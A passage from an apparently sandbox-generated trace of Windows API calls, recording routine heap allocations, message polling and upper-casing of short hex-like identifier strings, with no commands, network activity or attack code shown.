out: hHeap=0x2af0000) returned 1 [0151.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0151.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0151.850] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0151.850] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0151.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0151.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0151.850] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0151.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0151.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa240 [0151.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73bc0 [0151.850] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0151.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0151.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0151.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0151.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0151.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0151.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0151.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0151.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0151.851] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0151.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0151.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0151.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0151.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0151.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0151.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0151.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0151.851] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0151.851] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0151.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0151.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0151.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0151.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0151.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0151.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0151.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0151.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0151.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0151.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0151.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0151.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73bc0 | out: hHeap=0x2af0000) returned 1 [0151.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0151.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0151.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0151.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0151.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0151.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0151.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0151.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0151.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0151.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0151.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0151.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0151.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0151.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0151.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0151.852] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0151.852] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0151.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0151.852] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0151.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0151.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0151.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa528 [0151.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74088 [0151.852] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0151.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0151.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0151.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0151.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0151.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0151.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0151.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0151.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0151.853] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0151.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0151.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0151.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0151.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0151.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0151.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0151.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0151.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0151.853] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0151.853] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0151.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0151.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0151.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0151.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0151.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0151.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0151.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0151.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0151.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0151.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0151.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0151.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0151.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0151.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0151.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0151.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0151.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0151.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0151.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0151.854] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74088 | out: hHeap=0x2af0000) returned 1 [0151.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0151.854] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0151.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0151.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0151.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0151.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0151.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0151.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0151.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0151.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0151.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0151.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0151.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0151.855] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0151.855] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0151.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0151.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0151.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0151.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0151.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0151.855] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0151.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0151.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa240 [0151.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0151.855] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0151.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0151.855] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0151.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0151.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0151.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0151.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0151.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0151.855] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0151.856] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0151.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0151.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0151.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0151.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0151.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0151.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0151.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0151.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0151.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0151.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0151.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0151.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0151.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ac4ec0 | out: hHeap=0x2af0000) returned 1 [0151.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0151.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0151.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0151.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0151.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0151.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0151.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0151.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0151.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0151.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0151.882] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0151.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0151.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0151.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0151.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0151.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0151.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0151.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 